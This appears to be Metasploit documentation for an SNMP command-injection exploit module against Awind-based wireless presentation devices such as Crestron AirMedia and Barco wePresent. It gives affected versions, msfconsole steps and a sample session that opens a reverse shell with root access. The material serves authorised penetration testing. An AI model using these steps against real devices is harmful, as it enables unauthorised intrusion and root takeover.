Quentin Kaiser
2.1 KiB
2.1 KiB
Description
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
Note: a valid SNMP read-write community is required to exploit this vulnerability.
Vulnerable Devices
The following devices are known to be affected by this issue:
- Crestron Airmedia AM-100 <= version 1.5.0.4
- Crestron Airmedia AM-101 <= version 2.5.0.12
- Awind WiPG-1600w <= version 2.0.1.8
- Awind WiPG-2000d <= version 2.1.6.2
- Barco wePresent 2000 <= version 2.1.5.7
- Newline Trucast 2 <= version 2.1.0.5
- Newline Trucast 3 <= version 2.1.3.7
Verification Steps
- Start
msfconsole - Do:
use exploit/linux/snmp/awind_snmp_exec - Do:
set RHOST [IP] - Do:
set LHOST [IP] - Do:
run - You should get a session
Scenarios
msf5 > use exploit/linux/snmp/awind_snmp_exec
msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2
RHOSTS => 192.168.100.2
msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1
LHOST => 192.168.100.1
msf5 exploit(linux/snmp/awind_snmp_exec) > check
[*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6)
[+] 192.168.100.2:161 The target is vulnerable.
msf5 exploit(linux/snmp/awind_snmp_exec) > run
[*] Started reverse double SSL handler on 192.168.100.1:4444
[*] Injecting payload
[*] Injection successful
[*] Triggering call
[*] Trigger successful
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo LFNuuQAgrHrq1aq6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "LFNuuQAgrHrq1aq6\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.100.1:4444 -> 192.168.100.2:35189) at 2019-03-27 14:09:54 +0100
id
uid=0(root) gid=0(root)
uname -avr
Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #7 Thu Apr 2 16:50:50 CST 2015 armv6l GNU/Linux